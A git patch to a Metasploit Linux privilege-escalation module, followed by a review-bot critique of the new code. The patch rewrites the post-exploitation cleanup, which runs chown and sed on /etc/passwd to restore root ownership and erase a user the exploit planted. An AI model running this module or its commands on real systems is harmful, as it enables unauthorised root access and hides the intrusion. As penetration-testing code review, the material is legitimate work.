From e158ccb20b6b9afcff69023775757964f184cadd Mon Sep 17 00:00:00 2001
From: Brendan Coles
Date: Sun, 4 Feb 2018 04:38:53 +0000
Subject: [PATCH] Support cleanup for meterpreter sessions
---
 .../linux/local/abrt_raceabrt_priv_esc.rb | 65 ++++++++++++++++---
 1 file changed, 57 insertions(+), 8 deletions(-)
diff --git a/modules/exploits/linux/local/abrt_raceabrt_priv_esc.rb b/modules/exploits/linux/local/abrt_raceabrt_priv_esc.rb
index 018e107944..1670dad9d1 100644
--- a/modules/exploits/linux/local/abrt_raceabrt_priv_esc.rb
+++ b/modules/exploits/linux/local/abrt_raceabrt_priv_esc.rb
@@ -174,16 +174,65 @@ class MetasploitModule < Msf::Exploit::Local
 end
 def on_new_session(session)
- # Reinstate /etc/passwd ownership
- session.shell_command_token "chown root:root #{@chown_file}"
-
- # Remove new user
- session.shell_command_token "sed -i 's/^#{@username}.*$//g' #{@chown_file}"
- passwd = session.shell_command_token "grep #{@username} #{@chown_file}"
- if passwd.include? @username
- print_warning "Could not remove user '#{@username}' from #{@chown_file}"
+ if session.type.to_s.eql? 'meterpreter'
+ session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi'
 end
+ # Reinstate /etc/passwd root ownership and remove new user
+ root_owns_passwd = false
+ new_user_removed = false
+
+ if session.type.to_s.eql? 'meterpreter'
+ # Reinstate /etc/passwd root ownership
+ session.sys.process.execute '/bin/sh', "-c \"chown root:root #{@chown_file}\""
+
+ # Remove new user
+ session.sys.process.execute '/bin/sh', "-c \"sed -i 's/^#{@username}:.*$//g' #{@chown_file}\""
+
+ # Wait for clean up
+ Rex.sleep 5
+
+ # Check root ownership
+ passwd_stat = session.fs.file.stat(@chown_file).stathash
+ if passwd_stat['st_uid'] == 0 && passwd_stat['st_gid'] == 0
+ root_owns_passwd = true
+ end
+
+ # Check for new user in /etc/passwd
+ passwd_contents = session.fs.file.open(@chown_file).read.to_s
+ unless passwd_contents.include? "#{@username}:"
+ new_user_removed = true
+ end
+ elsif session.type.to_s.eql? 'shell'
+ # Reinstate /etc/passwd root ownership
+ session.shell_command_token "chown root:root #{@chown_file}"
+
+ # Remove new user
+ session.shell_command_token "sed -i 's/^#{@username}:.*$//g' #{@chown_file}"
+
+ # Check root ownership
+ passwd_owner = session.shell_command_token "ls -l #{@chown_file}"
+ if passwd_owner.to_s.include? 'root'
+ root_owns_passwd = true
+ end
+
+ # Check for new user in /etc/passwd
+ passwd_user = session.shell_command_token "grep '#{@username}:' #{@chown_file}"
+ unless passwd_user.to_s.include? "#{@username}:"
+ new_user_removed = true
+ end
+ end
+
+ unless root_owns_passwd
+ print_warning "Could not reinstate root ownership of #{@chown_file}"
+ end
+
+ unless new_user_removed
+ print_warning "Could not remove user '#{@username}' from #{@chown_file}"
+ end
+ rescue => e
+ print_error "Error during cleanup: #{e.message}"
+ ensure
 super
 end
 end
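Review bot: The shell-branch ownership check, `if passwd_owner.to_s.include? 'root'` on the output of `ls -l`, reports success whenever the word "root" appears anywhere in that line, so a file whose owner was restored but whose group still belongs to the new user (or the reverse) is counted as restored; the meterpreter branch checks both st_uid and st_gid, and the shell branch should be equally strict, e.g. `passwd_owner = session.shell_command_token "stat -c '%u:%g' #{@chown_file}"` followed by `root_owns_passwd = passwd_owner.to_s.strip == '0:0'`. The meterpreter branch pairs two asynchronous `session.sys.process.execute` calls with a fixed `Rex.sleep 5` before verifying, so on a slow target the stat and the file read can run before sed has finished and the warning fires for a cleanup that then succeeds; if `cmd_exec` from Msf::Post::Common is in scope for this module (likely through Msf::Exploit::Local, but not visible in the hunk), it blocks until the command completes on both session types and would let the two branches share one code path. Both sed invocations blank the user's line rather than deleting it (`sed -i '/^#{@username}:/d' #{@chown_file}` removes it outright), so even a successful cleanup leaves an empty line in /etc/passwd as a residue of the run. The meterpreter branch also never closes the handle returned by `session.fs.file.open(@chown_file)`.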